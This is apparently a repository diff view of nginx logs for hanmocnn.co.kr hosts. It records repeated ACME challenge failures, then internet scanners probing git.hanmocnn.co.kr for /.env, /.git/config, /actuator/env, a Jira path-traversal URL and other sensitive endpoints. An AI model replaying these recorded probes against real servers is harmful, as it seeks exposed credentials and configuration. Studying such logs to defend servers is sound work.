2026/02/16 20:20:34 [error] 882#882: *39474 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/11464694730725" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/11464694730725 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 21:20:56 [error] 883#883: *39654 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/215274441677" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/215274441677 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 22:21:24 [error] 886#886: *39787 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/17897272979361" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/17897272979361 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/16 23:21:49 [error] 886#886: *39862 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/20678166812577" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/20678166812577 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 00:22:12 [error] 897#897: *40032 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/76192759520205" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/76192759520205 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 01:22:35 [error] 895#895: *40148 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/138904984342" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/138904984342 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 02:23:01 [error] 895#895: *40347 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/3760852418392" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/3760852418392 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 03:23:26 [error] 896#896: *40714 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/31925400925461" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/31925400925461 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 04:23:52 [error] 897#897: *40922 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/29296462930121" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/29296462930121 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 05:24:20 [error] 899#899: *42449 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8775229557005" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8775229557005 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 06:24:44 [error] 908#908: *42484 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/26404614411107" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/26404614411107 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 07:25:11 [error] 913#913: *44023 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/162203037210280" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/162203037210280 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 08:25:35 [error] 913#913: *44057 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/15000139395299" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/15000139395299 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 09:25:59 [error] 906#906: *44107 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/123902837915426" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/123902837915426 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 10:26:22 [error] 913#913: *45616 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/185053078217732" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/185053078217732 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 11:26:46 [error] 906#906: *45647 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/6578555819323" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/6578555819323 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 12:27:11 [error] 922#922: *47159 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2804286426223" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2804286426223 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 13:27:35 [error] 924#924: *49877 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/155841106229467" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/155841106229467 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 14:28:01 [error] 917#917: *54223 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/21337180706381" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/21337180706381 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 15:28:23 [error] 917#917: *59840 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/25112267021969" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/25112267021969 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 16:28:48 [error] 917#917: *67902 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/354784396374" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/354784396374 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 17:29:13 [error] 920#920: *74708 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/315722950220654" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/315722950220654 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 18:29:36 [error] 933#933: *80974 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/259151616618584" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/259151616618584 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 19:29:58 [error] 935#935: *89640 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/20871894712564" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/20871894712564 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 21:30:48 [error] 934#934: *92656 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8218176617090" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8218176617090 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 22:31:13 [error] 928#928: *92781 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/1185790923909" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/1185790923909 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/17 23:31:39 [error] 928#928: *93030 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8643163407278" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8643163407278 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 00:32:01 [error] 946#946: *93258 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/985854727990" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/985854727990 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 01:32:23 [error] 942#942: *93476 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/30312320418403" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/30312320418403 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 02:32:47 [error] 939#939: *93556 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/5977297493722" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/5977297493722 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 03:33:13 [error] 943#943: *93664 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/66232682630494" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/66232682630494 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 04:33:38 [error] 943#943: *93729 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/19312097525391" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/19312097525391 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 05:34:01 [error] 941#941: *93756 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/13353443411800" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/13353443411800 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 06:34:23 [error] 955#955: *96807 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/76892721029507" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/76892721029507 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 07:34:47 [error] 956#956: *96901 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/749408432210" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/749408432210 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 10:36:09 [error] 950#950: *97000 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/29692719730346" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/29692719730346 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 11:36:34 [error] 952#952: *98616 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/302411196212851" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/302411196212851 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 12:36:57 [error] 964#964: *98743 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/16296355028267" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/16296355028267 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 13:37:20 [error] 968#968: *100443 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/28058106558622" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/28058106558622 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 14:37:43 [error] 968#968: *100689 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/25402311981443" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/25402311981443 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 15:38:05 [error] 962#962: *100707 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2010270943770" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2010270943770 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 16:38:31 [error] 961#961: *100725 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/19835181027399" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/19835181027399 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 17:38:54 [error] 963#963: *100781 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/13394307029520" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/13394307029520 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 18:39:22 [error] 978#978: *100804 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/296711207917157" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/296711207917157 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 19:39:45 [error] 972#972: *100822 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/4540805912569" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/4540805912569 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 20:40:09 [error] 973#973: *100933 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8014472331921" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8014472331921 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 21:40:31 [error] 972#972: *102585 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/183921038210713" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/183921038210713 HTTP/1.1", host: "mail.hanmocnn.co.kr"
2026/02/18 22:40:56 [error] 973#973: *102682 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/289971436316962" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/289971436316962 HTTP/1.1", host: "mail.hanmocnn.co.kr"

File diff suppressed because it is too large Load Diff

View File

@@ -1,782 +1 @@
2026/02/15 01:52:09 [error] 428#428: *3696 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "http://git.hanmocnn.co.kr/" 2026/02/19 03:45:38 [warn] 992#992: *108189 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/19/0000022198 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /assets/css/index.css?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/css/index.css?v=1.25.3", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:12 [warn] 428#428: *3700 using uninitialized "server" variable while logging request, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "LEAKIX"
2026/02/15 01:52:12 [error] 430#430: *3702 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:13 [error] 431#431: *3704 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:13 [error] 429#429: *3706 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /server HTTP/1.1", upstream: "http://192.168.0.250:3000/server", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:14 [error] 433#433: *3708 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /server HTTP/1.1", upstream: "http://192.168.0.250:3000/server", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:14 [error] 432#432: *3710 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /server-status HTTP/1.1", upstream: "http://192.168.0.250:3000/server-status", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:15 [error] 434#434: *3712 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /server-status HTTP/1.1", upstream: "http://192.168.0.250:3000/server-status", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:16 [error] 431#431: *3716 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /about HTTP/1.1", upstream: "http://192.168.0.250:3000/about", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:17 [error] 435#435: *3718 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /about HTTP/1.1", upstream: "http://192.168.0.250:3000/about", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:17 [error] 433#433: *3720 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /login.action HTTP/1.1", upstream: "http://192.168.0.250:3000/login.action", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:18 [error] 428#428: *3724 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /login.action HTTP/1.1", upstream: "http://192.168.0.250:3000/login.action", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:18 [error] 434#434: *3726 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /v2/_catalog HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/_catalog", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:19 [error] 428#428: *3728 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /v2/_catalog HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/_catalog", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:19 [error] 428#428: *3731 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.DS_Store HTTP/1.1", upstream: "http://192.168.0.250:3000/.DS_Store", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:19 [error] 435#435: *3730 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.DS_Store HTTP/1.1", upstream: "http://192.168.0.250:3000/.DS_Store", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:20 [error] 428#428: *3734 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.env HTTP/1.1", upstream: "http://192.168.0.250:3000/.env", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:20 [error] 428#428: *3736 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.env HTTP/1.1", upstream: "http://192.168.0.250:3000/.env", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:22 [error] 428#428: *3739 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", upstream: "http://192.168.0.250:3000/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:22 [error] 428#428: *3738 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", upstream: "http://192.168.0.250:3000/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:24 [error] 428#428: *3743 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.git/config HTTP/1.1", upstream: "http://192.168.0.250:3000/.git/config", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:24 [error] 428#428: *3742 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.git/config HTTP/1.1", upstream: "http://192.168.0.250:3000/.git/config", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:25 [error] 428#428: *3747 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:25 [error] 428#428: *3746 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:25 [error] 428#428: *3750 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /api HTTP/1.1", upstream: "http://192.168.0.250:3000/api", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:25 [error] 428#428: *3752 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /api/graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/graphql", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:25 [error] 428#428: *3755 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /graphql/api HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql/api", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:25 [error] 428#428: *3754 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /api HTTP/1.1", upstream: "http://192.168.0.250:3000/api", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:25 [error] 428#428: *3758 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /api/gql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/gql", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:26 [error] 428#428: *3761 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", upstream: "http://192.168.0.250:3000/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:26 [error] 428#428: *3760 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /api/graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/graphql", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:27 [error] 428#428: *3764 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /graphql/api HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql/api", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:27 [error] 428#428: *3766 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /config.json HTTP/1.1", upstream: "http://192.168.0.250:3000/config.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:27 [error] 428#428: *3768 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /api/gql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/gql", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:28 [error] 428#428: *3770 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", upstream: "http://192.168.0.250:3000/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:29 [error] 428#428: *3773 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /telescope/requests HTTP/1.1", upstream: "http://192.168.0.250:3000/telescope/requests", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:29 [error] 428#428: *3772 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /config.json HTTP/1.1", upstream: "http://192.168.0.250:3000/config.json", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:29 [error] 428#428: *3776 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /info.php HTTP/1.1", upstream: "http://192.168.0.250:3000/info.php", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:30 [error] 428#428: *3778 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.well-known/security.txt HTTP/1.1", upstream: "http://192.168.0.250:3000/.well-known/security.txt", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:31 [error] 428#428: *3782 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /telescope/requests HTTP/1.1", upstream: "http://192.168.0.250:3000/telescope/requests", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:31 [error] 430#430: *3785 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /actuator/env HTTP/1.1", upstream: "http://192.168.0.250:3000/actuator/env", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:31 [error] 428#428: *3780 connect() failed (111: Connection refused) while connecting to upstream, client: 95.215.39.14, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:31 [error] 428#428: *3787 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /info.php HTTP/1.1", upstream: "http://192.168.0.250:3000/info.php", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:32 [error] 428#428: *3780 connect() failed (111: Connection refused) while connecting to upstream, client: 95.215.39.14, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
2026/02/15 01:52:32 [error] 428#428: *3791 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.well-known/security.txt HTTP/1.1", upstream: "http://192.168.0.250:3000/.well-known/security.txt", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:33 [error] 430#430: *3793 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger-ui.html", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:33 [error] 428#428: *3795 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /actuator/env HTTP/1.1", upstream: "http://192.168.0.250:3000/actuator/env", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:34 [error] 430#430: *3797 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/index.html", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:35 [error] 430#430: *3799 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger/swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/swagger-ui.html", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:35 [error] 428#428: *3801 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger-ui.html", host: "git.hanmocnn.co.kr"
2026/02/15 01:52:36 [error] 430#430: *3803 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/webjars/swagger-ui/index.html", host: "git.hanmocnn.co.kr"
